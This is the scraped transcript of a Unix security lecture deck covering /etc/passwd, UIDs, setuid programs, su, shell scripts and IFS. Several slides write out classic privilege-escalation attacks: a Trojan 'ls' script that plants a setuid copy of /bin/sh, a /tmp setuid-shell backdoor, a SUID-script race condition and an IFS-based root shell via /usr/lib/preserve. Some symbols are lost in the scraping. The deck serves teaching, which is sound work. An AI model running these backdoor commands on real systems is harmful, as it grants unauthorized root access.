The Attack and Defense of Computers - PowerPoint PPT Presentation

1 / 27
About This Presentation
Title:

The Attack and Defense of Computers

Description:

John the Ripper password cracker -- Linux. Ophcrack 2 -- Windows. 6. One Time Password ... super user password. new prompt. 14. Security Problem with su. Type ... – PowerPoint PPT presentation

Number of Views:53
Avg rating:3.0/5.0
Slides: 28
Provided by: yanl
Category:

less

Transcript and Presenter's Notes

Title: The Attack and Defense of Computers


1
  • The Attack and Defense of Computers
  • Dr. ? ? ?

2
  • Passwords in Unix/Linux Systems

3
/etc/passwd
  • Format
  • Racehl eH5/.mj7NB3dx181100Rachel
    Cohen/u/rachelbin/ksh

home directory
uid
gid
user name
login shell
account name
encrpyted password
4
System Function Account
  • Unix opens special accounts for a variety of
    system functions. (e.g. daemon/sys, ftp, nobody,
    uucp)
  • daemon11 /tmp
  • ftp33FTP User/usr/sool/ftp
  • nobody6000160001/tmp
  • uucp44/usr/spool/uucppublic/us/lib/uucp/uuc
    ico

Prevent users from using login to log into the
system. (not include trusted host/user rlogin)
5
Password Crackers
  • Download (1)
  • Download (2)
  • John the Ripper password cracker -- Linux
  • Ophcrack 2 -- Windows

6
One Time Password
  • Password list
  • Small Card
  • Calculator

7
  • UID, GID, and SUID

8
Account Name and UID
  • UID 0 ? root.
  • A system identifies a user by her/his UID, not
    her/his name.
  • e.g. Name root, UID 100 ? no root privilege
  • Name doggy, UID 0 ? root privilege.
  • good habit user name root should be
    preserved for system administrators.
  • Users with different user names but with the same
    UID are treated as the same user by the system.

9
Real UIDs and Effective UIDs
  • A Unix process has at least these two IDs
  • Real UID
  • a process owners real identity
  • and
  • matches up with the username the owner logged in
    as.
  • Effective UID
  • a system decide a processs privilege based on
    this ID.
  • Usually, the above two IDs of a process are the
    same.

10
setuid or SUID program
  • When a suid program is run, the process involved
    takes on an efficient UID that is the same as the
    owner of the file, but the real UID remains the
    same as the one of the user that creates the
    process.
  • chmod 4xxx filename
  • e.g.
  • chmod 4757 program_name
  • ls al
  • ..
  • -rwsr-xrwx root user 16384 Sep 3 2005
    program_name

suid program indicator
11
setuid Program examples
  • su
  • passwd

12
Group
  • Each user belongs to a primary group that is
    stored in the /etc/passwd file.
  • The /etc/group file contains every group and its
    gid in a system.
  • vision101Keith,arlin,janice
  • users100
  • startrek102janice,karen,arlin
  • Each user can belong to several different groups,
    but her/his gid can be the gid of only one of the
    groups which she/he belongs to.
  • A user can use command newgrp to change her/his
    gid.

13
su Substitute User
  • whoami
  • tim
  • su john
  • Password
  • whomai
  • john
  • su
  • Password
  • whoami
  • root

super user password
new prompt
14
Security Problem with su
  • Type /bin/su -

cause the sub-shell to read all relevant startup
files and simulate a login therefore, the new
shell uses the roots environment variable,
including PATH.
1) avoid Trojan horse (another program with the
same name and in one of the directories listed
in the PATH variable.) 2) The access right of the
directory that contains the Trojan may not be set
correctly.
15
Stealing Superuser Account
  • Assume the roots PATH variable is as follows
    .xxxxxxx
  • Observation When going into a directory, the
    first command a user types usually is ls.
  • cat ls
  • ! /bin/sh
  • cp /bin/sh ./stuff/junk/.superdude
  • chmod 4555 ./stuff/junk/.superdude
  • rm f 0
  • exec /bin/ls 1_at_
  • cd
  • chmod 700 .
  • touch ./-f

A Trojan horse shell script with name ls.
1) Change the access right of the users home
directory so that the victim must use root
account to see the content of this directory. 2)
Create a file named -f
16
Account Steal by Passersby
  • cp /bin/sh /tmp/break-acct
  • chmod 4755 /tmp/break-acct

When a user left her/his terminal unnoticed, then
a bystander could create a backdoor easily by
just typing the above commands.
17
  • Shells and Shell Scripts

18
Shell
  • Also called a command line interpreter.
  • When you login a system, it
  • displays a prompt on the screen
  • and
  • waits for you to enter a commend.
  • A running shell is also a process.
  • Some of the famous shells
  • Bourne shell (/bin/sh)
  • Bourne Again shell (/bin/bash)
  • Korn Shell (/bin/ksh)
  • C-shell (/bin/csh)

19
Shell Script
  • A shell script is series of commands written in
    plain text file.
  • In order to make a shell script executable, its
    file permission must be changed to executable.
  • Usually the first line of a shell script is as
    follows
  • ! Shell
  • , then followed by a series of commands

20
Security Problems of SUID Shell Script
  • Two shells are involved in the execution of a
    shell script.
  • The shell that accepts the shell script command.
  • The shell that executes the shell script.
  • Race Conditon
  • cd /tmp
  • ln /etc/setid_script temp
  • nice -20 temp
  • mv my_script temp

Between the time the kernel opens the file to see
which interpreter to run, and when the
(now-set-id) interpreter turns around and reopens
the file to interpret it, an attacker might
change the file (directly or via symbolic links).
  • opened twice
  • by kernel
  • by executing shell

attack script
21
Solution
  • /dev/fd
  • When the kernel passes the name of the set-id
    script to open to the interpreter, rather than
    using a pathname (which would permit the race
    condition) it instead passes the filename
    /dev/fd/3.

22
  • IFS Security

23
IFS Environment Variable
  • The IFS specifies which characters separate
    commands.
  • It is normally set to a space, tab, or new line.

24
IFS and Shell Script Security
  • By changing the IFS, a hacker can change what
    programs our script executes.
  • Our script calls the /usr/bin/passwd program.
  • Changing the IFS to "/" with
  • export IFS'/'
  • causes the script to no longer run
    /usr/bin/passwd, but instead run usr bin passwd.
  • Now a hacker can create a script called usr that
    generates a root shell.

25
Security Hole in /usr/lib/preserve
vi
3. preserve saves the edited file in a restricted
area
1.telnet
2. disconnect
4. recover program reads the file from the area
26
/usr/lib/preserve and /bin/mail
  • preserve was installed SUID root.
  • preserve ran /bin/mail as the root user to alert
    users that their files had been preserved.
  • preserve executed the mail program with the
    system() function call.

According to the content of IFS to parse a string
into command, options, and arguments
27
Change IFS to Execute a Different Program/Script
  • If IFS/, then preserve will execute, bin mail
    instead of /bin/mail.

cat bin ! /bin/sh cd /home/mydir/bin cp
/bn/sh ./sh chown root sh chmod 4755 sh
Write a Comment
User Comments (0)
About PowerShow.com